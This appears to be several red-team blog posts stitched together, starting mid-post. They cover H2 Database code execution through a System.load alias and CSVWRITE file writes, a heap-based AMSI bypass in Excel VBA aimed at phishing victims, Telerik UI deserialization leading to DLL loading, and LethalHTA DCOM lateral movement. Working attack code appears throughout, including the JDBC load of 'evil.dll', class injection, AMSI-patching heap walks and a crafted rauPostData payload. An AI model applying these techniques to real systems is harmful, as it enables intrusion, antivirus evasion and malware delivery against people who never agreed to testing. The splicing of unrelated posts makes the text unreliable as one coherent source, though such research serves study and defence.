But what if the Java compiler is not available? This was the exact case in a recent engagement where an H2 Database Engine instance version 1.2.141 on a Windows system was exposing its web console. We want to walk you through the journey of finding a new way to execute arbitrary Java code without the need of a Java compiler on the target server by utilizing native libraries (.dll or .so) and the Java Native Interface (JNI).

Assessing the Capabilities of H2

Let's assume the CREATE ALIAS … AS … command cannot be used as the Java compiler is not available. A reason for that may be that it's not a Java Development Kit (JDK) but only a Java Runtime Environment (JRE), which does not come with a compiler. Or the PATH environment variable is not properly set up so that the Java compiler javac cannot be found.

However, the CREATE ALIAS … FOR … command can be used:

When referencing a method, the class must already be compiled and included in the classpath where the database is running. Only static Java methods are supported; both the class and the method must be public.

So every public static method can be used. But in the worst case, only h2-1.2.141.jar and a JRE are available. And additionally, only supported data types can be used for nested function calls. So, what is left?

While browsing the candidates in the Java runtime library rt.jar, the System.load(String) method stood out. It allows the loading of a native library. That would instantly allow code execution via the library's entry point function.
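A sketch of this step from an attacker's perspective (shown here via JDBC for brevity; the same two statements can also be issued through the exposed web console; connection details and the library path are placeholders, and the native library still has to be placed on the server first, which is covered next):

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.Statement;

public class SystemLoadAlias {
    public static void main(String[] args) throws Exception {
        try (Connection con = DriverManager.getConnection(
                     "jdbc:h2:tcp://target:9092/~/test", "sa", "");
             Statement st = con.createStatement()) {
            // CREATE ALIAS ... FOR ... only references an existing public static method,
            // so no Java compiler is required on the server
            st.execute("CREATE ALIAS IF NOT EXISTS SYSTEM_LOAD FOR \"java.lang.System.load\"");
            // Loading the (previously written) native library runs its initialization code
            st.execute("CALL SYSTEM_LOAD('C:\\Windows\\Temp\\evil.dll')");
        }
    }
}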

But how can the library be loaded to the H2 server? Although Java on Windows supports UNC paths and fetches the file, it refuses to actually load it. And this also won't work on Linux. So how can one write a file to the H2 server?

Writing arbitrary Files with H2

A brief look into the H2 functions reference shows that there is a FILE_WRITE function. Unfortunately, FILE_WRITE was introduced in 1.4.190. So we better only check those functions that are available in 1.2.141. The CSVWRITE function is the only one with "write" in its name.

A quick test showed that the CSV column header also gets printed. Looking at the CSV options showed that there is a writeColumnHeader option to disable writing the column header. Unfortunately, the writeColumnHeader option was only added with 1.3/1.4.177.

But while looking at the other supported options fieldSeparator, fieldDelimiter, escape, null, and lineSeparator, an idea came up: what if we blank them all out and use the CSV column header to write our data? And if the H2 database engine allows columns to have arbitrary names of arbitrary length, we would be able to write arbitrary data.

Looking at H2's grammar for columns, the columnName of a column can be a quoted name, which is defined as:

" anything "

Quoted names are case sensitive, and can contain spaces. There is no maximum name length. Two double quotes can be used to create a single double quote inside an identifier.

That sounds almost perfect. So let's see if we can actually put anything in it and if CSVWRITE is binary-safe.

First, we generate our test data that covers all 8-bit octets:

$ python -c 'import sys;[sys.stdout.write(chr(i)) for i in range(0,256)]' > test.bin
$ sha1sum test.bin
4916d6bdb7f78e6803698cab32d1586ea457dfc8  test.bin

Now we generate a series of CHAR(n) function calls that will generate our binary data in the SQL query:

xxd -p -c 256 test.bin | sed -e 's/../),CHAR(0x&/g' -e 's/^),//' -e 's/$/)/' -e 's/CHAR(0x22)/&,&/g'

We then use it in the following CSVWRITE call:

SELECT CSVWRITE('C:\Windows\Temp\test.bin', CONCAT('SELECT NULL "', … , '"'), 'ISO-8859-1', '', '', '', '', '');

Finally, we test if the written file has the same checksum:

C:\Windows\Temp> certutil -hashfile test.bin SHA1
SHA1 hash of file test.bin:
49 16 d6 bd b7 f7 8e 68 03 69 8c ab 32 d1 58 6e a4 57 df c8
CertUtil: -hashfile command completed successfully.

So, the files seem to be identical!

Entering the native World

Now that we can write a native library to disk using the built-in function CSVWRITE and load it by creating an alias for System.load(String), we just could use the library's entry point to achieve code execution.

But let's take it another step further. Let's see if there is a way to execute arbitrary commands/code from SQL. Not just once the native library gets loaded, but whenever we like, possibly even with feedback that we can see in the H2 Console.

This is where the Java Native Interface (JNI) comes in. It allows the interaction between native code and the Java Virtual Machine (JVM). So in this case it would allow us to interact with JVM where the H2 Database is running.

The idea now is to use JNI to inject a custom Java class into the running JVM via ClassLoader.defineClass(byte[], int, int). That would allow us to create an alias and call it from SQL.

Calling into the JVM with JNI

First we need to get a handle to the running JVM. This can be done with the JNI_GetCreatedJavaVMs function. Then we attach the current thread to the VM and obtain a JNI interface pointer (JNIEnv). With that pointer we can interact with the JVM and call JNI functions such as FindClass, GetStaticMethodID/GetMethodID and CallStatic<Type>Method/Call<Type>Method. The plan is to get the system class loader via ClassLoader.getSystemClassLoader() and call defineClass on it:

This basically mimics the following Java code:
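The referenced listing is not included here; conceptually, the JNI call sequence corresponds to the following Java code (via JNI the protected defineClass can be invoked directly, so the reflection detour shown here is only needed when expressing it in plain Java):

import java.lang.reflect.Method;

public class DefineClassEquivalent {
    // Injects a compiled class (raw .class bytes) into the running JVM
    public static Class<?> inject(byte[] classBytes) throws Exception {
        ClassLoader systemClassLoader = ClassLoader.getSystemClassLoader();
        Method defineClass = ClassLoader.class.getDeclaredMethod(
                "defineClass", byte[].class, int.class, int.class);
        defineClass.setAccessible(true); // defineClass is protected
        return (Class<?>) defineClass.invoke(systemClassLoader, classBytes, 0, classBytes.length);
    }
}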

The custom Java class JNIScriptEngine has just one single public static method that evaluates the passed script using an available ScriptEngine instance:
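A minimal version of such a class might look like this (method name and signature are assumptions, the original is not reproduced here):

import javax.script.ScriptEngine;
import javax.script.ScriptEngineManager;

public class JNIScriptEngine {
    // Single public static entry point, so that it can later be exposed to SQL
    // via CREATE ALIAS ... FOR "JNIScriptEngine.eval"
    public static String eval(String script) throws Exception {
        ScriptEngine engine = new ScriptEngineManager().getEngineByName("JavaScript");
        return String.valueOf(engine.eval(script));
    }
}

Once injected, something like CREATE ALIAS EVAL FOR "JNIScriptEngine.eval" followed by SELECT EVAL('1+1') would expose it to SQL.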

Finally, putting everything together:

That way we can execute arbitrary JavaScript code from SQL.

Heap-based AMSI bypass for MS Excel VBA and others

By: Dan
19 July 2019 at 12:03

This blog post describes how to bypass Microsoft's AMSI (Antimalware Scan Interface) in Excel using VBA (Visual Basic for Applications). In contrast to other bypasses this approach does not use hardcoded offsets or opcodes but identifies crucial data on the heap and modifies it. The idea of a heap-based bypass has been mentioned by other researchers before, but at the time of writing this article no public PoC was available. This blog post will provide the reader with some insights into the AMSI implementation and a generic way to bypass it.


Introduction

Since Microsoft rolled out their AMSI implementation, many writeups about bypassing the implemented mechanism have been released. Code White regularly conducts Red Team scenarios where phishing plays a big role. Phishing is often related to MS Office, in particular to malicious scripts written in VBA. According to Microsoft, AMSI also covers VBA code placed into MS Office documents. This fact motivated some research performed earlier this year, in which we evaluated if and how AMSI can be defeated in an MS Office Excel environment.

In the past several different approaches have been published to bypass AMSI. The following links contain information which was used as inspiration or reference:


The first article from the list above also mentions a heap-based approach. Independently of that write-up, Code White's approach used exactly that idea. At the time of writing this article there was no code publicly available which implements this idea, which was another motivation to write this blog post. Porting the bypass to MS Excel/VBA revealed some nice challenges which had to be solved. The following chapters show the evolution of Code White's implementation in a chronological way:

  • Implementing our own AMSI Client in C to have a debugging platform
  • Understanding how the AMSI API works
  • Bypassing AMSI in our own client
  • Porting this approach to VBA
  • Improving the bypass
  • Improving the bypass - making it production-ready

Implementing our own AMSI Client

In order to ease debugging we will implement our own small AMSI client in C which triggers a scan on the malicious string ‘amsiutils’. This string gets flagged as evil since some AMSI bypasses of Matt Graeber used it. Scanning this simple string is a simple way to check if AMSI works at all and to verify if our bypass is functional. A ready-to-use AMSI client can be found on sinn3r's GitHub. This code provided us a good starting point and also contained important hints, e.g. the pre-condition in the Local Group Policies.

We will implement our test client using Microsoft Visual Studio Community 2017. In a first step, we end up with two functions, amsiInit() and amsiScan(), not to be confused with functions exported by amsi.dll. Later we will add another function amsiByPass() which does what its name suggests. See this gist for the final code including the bypass.



Running the program generates the following output:

This means our ‘amsiutils’ is considered as evil. Now we can proceed working on our bypass.

Understanding AMSI Structures

As promised we would like to do a heap-based bypass. But why heap-based?

At first we have to understand that using the AMSI API requires initializing a so called AMSI Context (HAMSICONTEXT). This context must be initialized using the function AmsiInitialize(). Whenever we want to scan something, e.g. by calling AmsiScanBuffer(), we have to pass our context as first parameter. If the data behind this context is invalid the related AMSI functions will fail. This is what we are after, but let's talk about that later.
Having a look at HAMSICONTEXT we will see that this type gets resolved by the pre-processor to the following:


So what we got here is a pointer to a struct called ‘HAMSICONTEXT__’. Let's have a look where this pointer points to by printing the memory address of  ‘amsiContext’ in our client. This will allow us to inspect its contents using windbg:

The variable itself is located at address 0x16a144 (note we have 32-bit program here) and its content is 0x16c8b10, that's where it points to. At address 0x16c8b10 we see some memory starting with the ASCII characters ‘AMSI’ identifying a valid AMSI context. The output below the memory field is derived via ‘!address’ which prints the memory layout of the current process.

There we can see that the address 0x16c8b10 is allocated to a region starting from 0x16c0000 to 0x16df0000 which is identified as Heap. Okay, that means AmsiInitialize() delivers us a pointer to a struct residing on the heap. A deeper look into AmsiInitialize() using IDA delivers some evidence for that:

The function allocates 16 bytes (10h) using the COM-specific API CoTaskMemAlloc(). The latter is intended to be an abstraction layer for the heap. See here and here for details. After allocating the buffer the Magic Word 0x49534D41 is written to the beginning of the block, which is nothing more than our ‘AMSI’ in ASCII.

It is worth noting that an application cannot easily change this behavior. The content of the AMSI context will always be stored on the heap unless really sneaky things are done, like copying the context to somewhere else or implementing your own memory provider. This explains why Microsoft states in their API documentation that the application is responsible for calling AmsiUninitialize() when it is done with AMSI. This is because the client cannot (should not) free that memory and the process of cleaning up is performed by the AMSI library.

Now we have understood that
  • the AMSI Context is an important data structure
  • it is always placed on the heap
  • it always starts with the ASCII characters ‘AMSI’
In case our AMSI context is corrupt, functions like AmsiScanBuffer() will fail with a return value different from zero. But what does corrupt mean, and how does AmsiScanBuffer() detect if the context is valid? Let's check that in IDA:


The function does what we already spoilered in the beginning: the first four bytes of the AMSI context are compared against the value ‘0x49534D41’. If the comparison fails, the function returns 0x80070057, which does not equal 0 and signals that something went wrong.

Bypassing AMSI in our own AMSI Client

Our heap-based approach assumes several things in order to work as a bypass:

  • we already have code execution in the context of the AMSI client, e.g. by executing a VBA script
  • the AMSI client (e.g. Excel) initializes the AMSI context only once and reuses this for every AMSI operation
  • the AMSI client rates the checked payload in case of a failure of AmsiScanBuffer() as ‘not malicious’

The first point is not true for our test client but also not required because it depicts only a test vehicle which we can modify as desired.

Especially the last point is important because we will try to mess up the one and only AMSI context available in the target process. If the failure of AmsiScanBuffer() leads to negative side effects (in the worst case the program might crash), the bypass will not work.

So our task is to iterate through the heap of the AMSI client process, look for chunks starting with ‘AMSI’ and mess this block up making all further AMSI operations fail.

Microsoft provides a nice code example which walks through the heap using a couple of functions from kernel32.dll.

Due to the fact that all the required information is present in user space one could do this task by parsing data structures in memory. Doing so would make the use of external functions obsolete but probably blow up our code so we decided to use the functions from the example above.

After cutting the example down to the minimum functionality we need, we end up with a function amsiByPass().


So this code retrieves the heap of the current process, iterates through it and looks at every chunk tagged as 'busy'. Within these busy chunks we check if the first bytes match our magic pattern ‘AMSI’ and if so overwrite it with some garbage.

The expectation is now that our payload is no longer flagged as malicious but the AmsiScanBuffer() function should return with a failure. Let's check that:

Okay, that's exactly what we expected. Are we done? No, not yet, as we promised to provide an AMSI bypass for Excel/VBA, so let's move on...

Bypassing AMSI in Excel using VBA

Now we will dive into the strange world of VBA. We used Microsoft Excel for Office 365 MSO (16.0.11727.20222) 32-bit for our testing.

After having written a basic POC in C we have to port this POC to VBA. VBA supports importing arbitrary external functions from DLLs so using our Heap APIs should be no problem. As far as we understood VBA, it does not allow pointer arithmetic or direct memory access. This problem can be resolved by importing a function which allows copying data from arbitrary memory locations into VBA variables. A very common function to perform this task is RtlMoveMemory().

After some code fiddling we came up with the following code.

As you can see we put some time measurement around the main loop. The loop may take several hundred thousand iterations, and combined with the poor VBA performance we expected the bypass to take a significant amount of time. Time is a crucial thing in a real attack scenario. If our phishing victim opens a malicious Excel sheet, it is not acceptable that the embedded script blocks the execution for, let's say, more than one or two seconds. At the latest after 5 seconds of perceived unresponsiveness of the application a human will get impatient and do things like trying to close Excel, which is not what we want.

So let's see how long the bypass takes. To be honest, we did not expect what happened. The result was difficult to reproduce, but the measured runtime varied from 15 minutes to seemingly endless. In some rare cases Excel was closed after some minutes without any further notice, probably because it was unresponsive for too long. However, this isn't really something we can use in a real scenario.

Okay, so what went wrong here? Is VBA really that slow? Yes, it is some orders of magnitude slower than our C code, but that does not explain what we experienced. Microsoft gives some internal details on how AMSI is implemented in Excel. It turns out that Excel uses another strategy than e.g. PowerShell does. The latter more or less sends the whole script to AmsiScanBuffer(). Excel implements a somewhat smarter approach which is based on so-called triggers. Microsoft considers pure VBA code to be harmless until the point when imports come into play. That's exactly what we do - importing functions from external DLLs. Some of these imports are treated as potentially dangerous and their calls, including all parameters, are put into a ring buffer which is sent to AMSI. This gives AV solutions like MS Defender the opportunity to check the data behind addresses, which of course makes sense. Let's see what data is sent to the AMSI API in our explicit case by breaking on AmsiScanBuffer using windbg:

As we can see the ring buffer contains all functions we imported including their parameter values. Our Windows 10 system has MS Defender installed and activated. So every call to AmsiScanBuffer() will bother our friend MS Defender. AMSI is implemented as in-process COM in the first place. But to finally communicate with other AV solutions it has to transport data out of process and perform a context switch. This can be seen in the following architecture overview provided by MS:

Source: https://docs.microsoft.com/en-us/windows/win32/amsi/how-amsi-helps
The little green block at the bottom of the figure shows that our process (Excel) indirectly communicates with Defender via RPC. Okay, so this is done several hundred thousand times, which is just too much and explains the long runtime. To provide more evidence, we repeat the bypass with Defender switched off, which should significantly speed it up. In addition, we monitor the number of calls to AmsiScanBuffer() to get an impression of how often it is called.

The same loop with Defender disabled took something between one and two minutes:

In a separate run we check the amount of calls to AmsiScanBuffer() using windbg:

AmsiScanBuffer() is called 124624 times (0x10000000 - 0xffe1930), which is roughly the number of iterations our loop did. That's a lot and underlines our assumption that AMSI is simply called very often. So we understand what is going on, but for now there seems to be no workaround for our runtime problem.

Giving up now? Not yet...

Improving AMSI Bypass in Excel

As described in the chapter above our current approach is much too slow to be used in a real scenario. So what can we do to improve this situation?

One of the functions we imported is RtlMoveMemory(), which, as mentioned earlier, is used by a lot of malware. Monitoring this function would make a lot of sense, so it might well be considered a trigger. Let's verify that by removing the call to CopyMem (the alias for RtlMoveMemory) and seeing what happens. This prevents our bypass from working, but it might give us some insight.

The runtime is now at 0.8 seconds. Wow, okay, this really made a difference. Note that in this configuration we even walk through the whole heap; due to the missing call to RtlMoveMemory() we just never find our pattern.

Having identified our bottleneck, what can we do? We have to find an alternative way to access raw memory that is not treated as a trigger by Excel. Some random googling revealed the function CryptBinaryToStringA(), which is part of crypt32.dll. The latter should be present on most Windows systems, so it should be fine to import it.

The function is intended to convert binary data from one string format to another, but it can also be abused to simply copy bytes from an arbitrary memory location we specify. Cool, that's exactly what we are after! To abuse this function for our purpose, we call it as follows to read the lpData field from the PROCESS_HEAP_ENTRY structure (the native prototype is sketched below the parameter list):
The input parameters from left to right:
  • phe.lpData is the source we want to copy data from,
  • ByVal 4 is the length of bytes we want to copy (lpData is 32-bit on our 32-bit Excel)
  • ByVal 2 means we want to copy raw binary (CRYPT_STRING_BINARY)
  • ByVal VarPtr(magicWord) is the target we want to copy that memory to (our VBA variable magicWord)
  • the last parameter (ByVal VarPtr(bytesWritten)) tells us how many bytes were really copied
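
For reference, this is how the arguments above map onto the native prototype from wincrypt.h (the comments mirror our VBA call; only the first four bytes of the heap block end up in magicWord):

BOOL CryptBinaryToStringA(
    const BYTE *pbBinary,    // phe.lpData                 - address we want to read from
    DWORD       cbBinary,    // ByVal 4                    - number of bytes to copy
    DWORD       dwFlags,     // ByVal 2                    - CRYPT_STRING_BINARY (raw copy)
    LPSTR       pszString,   // ByVal VarPtr(magicWord)    - destination VBA variable
    DWORD      *pcchString   // ByVal VarPtr(bytesWritten) - receives the number of bytes written
);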

So let's replace all occurrences of RtlMoveMemory() with CryptBinaryToStringA() and check again how long our bypass takes. You can find an updated version of the source code right here.

Our loop now takes about four seconds to finish. That is still a lot, but it finished and it told us that it found the pattern we are looking for. Let's see how many times Excel calls AmsiScanBuffer() with this version:


Oh my... Excel did not call AmsiScanBuffer() at all. This means that as long as there is no trigger in our code, nothing is sent to AMSI. Or the other way around: as soon as we use a single trigger function, Excel will send all calls to AMSI. Good to know...

This is the first time we can really verify whether the bypass works. So let's look for some code that triggers AMSI from VBA. Iliya Dafchev shows a port of an older AMSI bypass to VBA which itself gets flagged by AMSI right away. Perfect, we will put this code into a function called triggerAMSI() and use it as a positive test:

After running it, Excel complains with a warning as expected and simply closes our current Excel instance:

AMSI Alert by Excel - sorry for the German!
Putting our bypass and our positive test together we get the following function:


Hopes are high that the message box containing “we survived” gets displayed, because we killed AMSI before triggering it.


Great, our bypass seems to work. So let's put this into our real phishing campaign. Uhm... just wait, how long did the whole thing take? Four seconds? Repeated executions of the bypass even showed runtimes greater than ten seconds. Oh no, this is still too much.

Giving up now? Not yet...

Improving AMSI Bypass in Excel - continued

In the last chapter we improved our AMSI bypass from a near-infinite runtime to ten seconds or below. In our opinion this is still too much for a real campaign. So what can we do to speed the whole thing up one more time?

The loop takes a few hundred thousand iterations, which C gets through in no time, and Defender is completely out of the game. So our current runtime seems to be purely a result of poor VBA performance. To be fair, the kind of things we are trying to do are not a typical VBA task, so let's blame ourselves instead of Excel for doing crazy stuff...

Anyway, what can we do now? Programming C in VBA is not an option, but what about invoking some shellcode? As long as we can import arbitrary functions, executing shellcode should not be a problem. This code snippet shows an example of how to do that from VBA. The next step is converting our VBA code (or rather our initial C code) into assembly language, that is, into shellcode.

Everyone who has ever written a piece of shellcode and wanted to call functions from DLLs knows that the absolute addresses of these functions are not known at the time the shellcode is assembled. This means we have to implement a mechanism like GetProcAddress() to look up the addresses of the required functions at runtime. How to do this without any library support is well understood and extensively documented, so we will not go into details here. Implementing this part of the shellcode is left as an exercise for the reader.

Of course there are many ready-to-use code snippets that should do the job, but we decided to implement the shellcode on our own. Why? Because it is fun, and self-written shellcode is unlikely to get caught by AV solutions.

The main loop of our AMSI bypass in assembly can be found here.

The structure ShellCodeEnvironment holds some important information such as the looked-up addresses of our HeapWalk() and GetProcessHeaps() functions. The rest of the loop should be straightforward...
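Since the assembly listing is only linked, here is a rough C equivalent of what the loop boils down to. It is a sketch only: the magic DWORD value, the overwrite with zero and the fixed array of 64 heap handles are assumptions for illustration, not necessarily the exact pattern and patch used by the POC.

#include <windows.h>

// Walk all process heaps and neutralize every busy block that starts with the
// magic DWORD we are looking for (illustrative value: "AMSI" = 0x49534D41).
void patch_heap_pattern(void)
{
    HANDLE heaps[64];
    DWORD count = GetProcessHeaps(64, heaps);

    for (DWORD i = 0; i < count; i++) {
        PROCESS_HEAP_ENTRY entry = { 0 };           // lpData == NULL starts the enumeration
        while (HeapWalk(heaps[i], &entry)) {
            if ((entry.wFlags & PROCESS_HEAP_ENTRY_BUSY) &&
                entry.cbData >= sizeof(DWORD) &&
                *(DWORD *)entry.lpData == 0x49534D41) {
                *(DWORD *)entry.lpData = 0;         // corrupt the pattern so AmsiScanBuffer() fails
            }
        }
    }
}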

So putting everything together we generate our shellcode, put it into our VBA code and start it from there as a new thread. Of course we measure the runtime again:


This time it is only 0.02 seconds!

We think this result is more than acceptable. The runtime may vary depending on the processor load or the total heap size but it should be significantly below one second which was our initial goal.

Summary

We hope you enjoyed reading this blog post. We showed the feasibility of a heap-based AMSI bypass for VBA. The same approach, with slight adaptations, also works for PowerShell and .NET 4.8; the latter also comes with AMSI support integrated into its Common Language Runtime. As per Microsoft, AMSI is not a security boundary, so we do not expect much of a reaction, but we are still curious whether MS will develop detection mechanisms for this approach.

Telerik Revisited

7 February 2019 at 10:04

In 2017, several vulnerabilities were discovered in Telerik UI, a popular UI component library for .NET web applications. Although details and working exploits are public, it often proves to be a good idea to take a closer look, because sometimes it allows you to explore new avenues of exploitation.

Introduction

Telerik UI for ASP.NET is a popular UI component library for ASP.NET web applications. In 2017, several vulnerabilities were discovered, potentially resulting in remote code execution:

CVE-2017-9248: Cryptographic Weakness
A cryptographic weakness allows the disclosure of the encryption key (Telerik.Web.UI.DialogParametersEncryptionKey and/or the MachineKey) used to protect the DialogParameters via an oracle attack. It can be exploited to forge a functional file manager dialog and upload arbitrary files, and, if the MachineKey is disclosed, to compromise the ASP.NET ViewState.
CVE-2017-11317: Hard-coded default key
A hard-coded default key is used to encrypt/decrypt the AsyncUploadConfiguration, which holds the path where uploaded files are stored temporarily. It can be exploited to upload files to arbitrary locations.
CVE-2017-11357: Insecure Direct Object Reference
The name of the file stored in the location specified in AsyncUploadConfiguration is taken from the request and thus allows the upload of files with arbitrary extension.

The vulnerabilities were fixed in R2 2017 SP1 (2017.2.621) and R2 2017 SP2 (2017.2.711), respectively. As for CVE-2017-9248, there is an analysis by PatchAdvisor[1] that gives some insights and exploitation hints. And regarding CVE-2017-11317, the detailed writeup by @straight_blast seems to have been published even half a year before Telerik published an updated version. It describes in detail how the vulnerability was discovered and how it can be exploited to upload an arbitrary file to an arbitrary location. If you're unfamiliar with these vulnerabilities, you may want to read the linked advisories first to get a better understanding.

The Catch

Although the vulnerabilities sound promising, they all have their catch: exploiting CVE-2017-9248 requires many thousands of requests, which can be pretty noticeable and suspicious. And unless it is actually possible to leak the MachineKey (which would allow exploitation via deserialization of an arbitrary ObjectStateFormatter stream), a file upload to an arbitrary location (i. e., CVE-2017-11317) is still limited by the need to know an appropriate location with sufficient write permissions.

The problem here is that by default the account that the IIS worker process w3wp.exe runs with is a special account like IIS AppPool\DefaultAppPool. And such an account usually does not have write permissions to the web document root directory like C:\inetpub\wwwroot or similar. Additionally, the web document root of the web application can also be somewhere else and may not be known. So simply writing an ASP.NET web shell probably won't work in many cases.

The Dead End

This was exactly the case when we faced Managed Workplace RMM by Avast Business in a red team assessment where we didn't want to make too much noise. Additionally, unauthenticated access to all *.aspx pages except for Login.aspx was denied, i. e., the handler Telerik.Web.UI.DialogHandler.aspx for exploiting CVE-2017-9248 was not reachable, and the other one, Telerik.Web.UI.SpellCheckHandler.axd, was not registered. So, CVE-2017-11317 seemed to be the only option left.

By enumerating known versions of Telerik Web UI, one request to upload to C:\Windows\Temp was finally successful. But an upload to C:\inetpub\wwwroot did not succeed. And since we did not have access to an installation of Managed Workplace, we had no insights into its directory structure. So this seemed to be a dead end.

The New Avenue

While tracing the path of the provided rauPostData through the Telerik code, one aspect became apparent that nobody had mentioned before: the exploitation of CVE-2017-11317 was always advertised as an arbitrary file upload. This seems obvious, as the handler's name is AsyncUploadHandler and rauPostData contains the upload configuration.

But after taking a closer look at the code that processes the rauPostData, it showed that the rauPostData is expected to consist of two parts separated by a &.

// Telerik.Web.UI.AsyncUploadHandler
internal IAsyncUploadConfiguration GetConfiguration(string rawData)
{
 string[] array = rawData.Split(new char[]
 {
  '&'
 });
 string obj = array[0];
 Type type = Type.GetType(CryptoService.GetService().Decrypt(array[1]));
 IAsyncUploadConfiguration asyncUploadConfiguration = (IAsyncUploadConfiguration)SerializationService.Deserialize(obj, type, true);
 if (!this.IsValidHMac(asyncUploadConfiguration.TargetFolder) || !this.IsValidHMac(asyncUploadConfiguration.TempTargetFolder))
 {
  throw new CryptographicException("The hash is not valid!");
 }
 asyncUploadConfiguration.TargetFolder = AsyncUploadHandler.DecryptFolder(this.GetEncryptedText(asyncUploadConfiguration.TargetFolder));
 asyncUploadConfiguration.TempTargetFolder = AsyncUploadHandler.DecryptFolder(this.GetEncryptedText(asyncUploadConfiguration.TempTargetFolder));
 return asyncUploadConfiguration;
}

The first part (array[0]) is the JSON data and the second part (array[1]) is the encrypted assembly qualified name of the type that the JSON data should be deserialized into. The Deserialize() call then ends up in SerializationService.Deserialize(string, Type):

// Telerik.Web.UI.AsyncUpload.SerializationService
internal static object Deserialize(string obj, Type type)
{
 JavaScriptSerializer serializer = SerializationService.GetSerializer(obj.Length);
 SerializationService.ApplyConverters(type, serializer);
 MethodInfo methodInfo = typeof(JavaScriptSerializer).GetMethod("Deserialize", new Type[]
 {
  typeof(string)
 }, null).MakeGenericMethod(new Type[]
 {
  type
 });
 return methodInfo.Invoke(serializer, new object[]
 {
  obj
 });
}

Here a JavaScriptSerializer gets parameterized with the type provided in the rauPostData. That means this is an arbitrary JavaScriptSerializer deserialization!

From the research Friday the 13th JSON Attacks by Alvaro Muñoz & Oleksandr Mirosh it is known that arbitrary JavaScriptSerializer deserialization can be harmful if the expected type can be specified by the attacker. During deserialization, appropriate setter methods get called. A suitable gadget is the System.Configuration.Install.AssemblyInstaller, which allows the loading of a DLL by specifying its path. If the DLL is a mixed mode assembly, its DllMain() entry point gets called on load, which allows the execution of arbitrary code in the context of the w3wp.exe process.
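
To illustrate the format, a rauPostData value would conceptually look like the following before the type part gets encrypted with the known hard-coded key; the DLL path and the details of the assembly qualified type name are purely illustrative:

{"Path":"C:\Windows\Temp\payload.dll"}&System.Configuration.Install.AssemblyInstaller, System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a

During deserialization, the JavaScriptSerializer invokes the Path setter of AssemblyInstaller, which loads the DLL; for a mixed mode assembly its DllMain() runs at that point.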

This allowed the remote code execution on Managed Workplace without authentication. The issue has been addressed and should be fixed in Managed Workplace 11 SP4 MR2.

Conclusion

So CVE-2017-11317 can be exploited even without the requirement of being able to write to the web document root:

  1. Upload a mixed mode assembly DLL to a writable location using the regular AsyncUploadConfiguration exploit.
  2. Load the uploaded DLL and thereby trigger its DllMain() function using the AssemblyInstaller exploit described above.

This is an excellent example that revisiting old vulnerabilities can be worthwhile and result in new ways out of a supposed dead end.


LethalHTA - A new lateral movement technique using DCOM and HTA

By: Unknown
6 July 2018 at 12:08

The following blog post introduces a new lateral movement technique that combines the power of DCOM and HTA. The research on this technique is partly an outcome of our recent research efforts on COM Marshalling: Marshalling to SYSTEM - An analysis of CVE-2018-0824.

Previous Work

Several lateral movement techniques using DCOM were discovered in the past by Matt Nelson, Ryan Hanson, Philip Tsukerman and @bohops. A good overview of all the known techniques can be found in the blog post by Philip Tsukerman. Most of the existing techniques execute commands via ShellExecute(Ex). Some COM objects provided by Microsoft Office allow you to execute script code (e.g. VBScript), which makes detection and forensics even harder.

LethalHTA

LethalHTA is based on a very well-known COM object that was used in all the Office Moniker attacks in the past (see FireEye's blog post):

  • ProgID: "htafile"
  • CLSID : "{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}"
  • AppID : "{40AEEAB6-8FDA-41E3-9A5F-8350D4CFCA91}"
Using James Forshaw's OleViewDotNet we get some details on the COM object. The COM object runs as local server.

It has an App ID and default launch and access permissions. Only COM objects having an App ID can be used for lateral movement.

It also implements various interfaces as we can see from OleViewDotNet.

One of the interfaces is IPersistMoniker. This interface is used to save/restore a COM object's state to/from an IMoniker instance.

Our initial plan was to create the COM object and restore its state by calling the IPersistMoniker->Load() method with a URLMoniker pointing to an HTA file. So we created a small program and ran it in Visual Studio.

But calling IPersistMoniker->Load() returned an error code 0x80070057. After some debugging we realized that the error code came from a call to CUrlMon::GetMarshalSizeMax(). That method is called during custom marshalling of a URLMoniker. This makes perfect sense since we called IPersistMoniker->Load() with a URLMoniker as a parameter. Since we do a method call on a remote COM object the parameters need to get (custom) marshalled and sent over RPC to the RPC endpoint of the COM server.

So looking at the implementation of CUrlMon::GetMarshalSizeMax() in IDA Pro we can see a call to CUrlMon::ValidateMarshalParams() at the very beginning.

At the very end of this function we can find the error code set as return value of the function. Microsoft is validating the dwDestContext parameter. If the parameter is MSHCTX_DIFFERENTMACHINE (0x2) then we eventually reach the error code.

As we can see from the references to CUrlMon::ValidateMarshalParams() the method is called from several functions during marshalling.

In order to bypass the validation we can take the same approach as described in our last blog post: creating a fake object. The fake object needs to implement IMarshal and IMoniker and forwards all calls to the real URLMoniker instance. To bypass the validation, the implementations of GetMarshalSizeMax(), GetUnmarshalClass() and MarshalInterface() need to modify the dwDestContext parameter to MSHCTX_NOSHAREDMEM (0x1) before forwarding. The idea behind the implementation of GetMarshalSizeMax() is shown in the following sketch.
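
A minimal sketch of that forwarding method could look like this (class and member names are ours; m_marshal is assumed to be the IMarshal interface obtained from the real URLMoniker):

HRESULT STDMETHODCALLTYPE FakeObject::GetMarshalSizeMax(REFIID riid, void *pv,
    DWORD dwDestContext, void *pvDestContext, DWORD mshlflags, DWORD *pSize)
{
    // Pretend we are not marshalling to a different machine so that
    // CUrlMon::ValidateMarshalParams() does not reject the call.
    return m_marshal->GetMarshalSizeMax(riid, pv, MSHCTX_NOSHAREDMEM,
                                        pvDestContext, mshlflags, pSize);
}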

And that's all we need to bypass the validation. Of course we could also patch the code in urlmon.dll. But that would require us to call VirtualProtect() to make the page writable and modify CUrlMon::ValidateMarshalParams() to always return zero. Calling VirtualProtect() might get caught by EDR or "advanced" AV products so we wouldn't recommend it.

Now we are able to call the IPersistMoniker->Load() on the remote COM object. The COM object implemented in mshta.exe will load the HTA file from the URL and evaluate its content. As you already know the HTA file can contain script code such as JScript or VBScript. You can even combine our technique with James Forshaw's DotNetToJScript to run your payload directly from memory!

It should be noted that the file doesn't necessarily need to have the hta file extension. Extensions such as html, txt, rtf work fine as well as no extension at all.

LethalHTA and LethalHTADotNet

We created implementations of our technique in C++ and C#. You can run them as standalone programs. The C++ version is more of a proof of concept and might help you create a reflective DLL from it. The C# version can also be loaded as an assembly with Assembly.Load(Byte[]), which makes it easy to use in a PowerShell script. You can find both implementations under releases on our GitHub.

CobaltStrike Integration

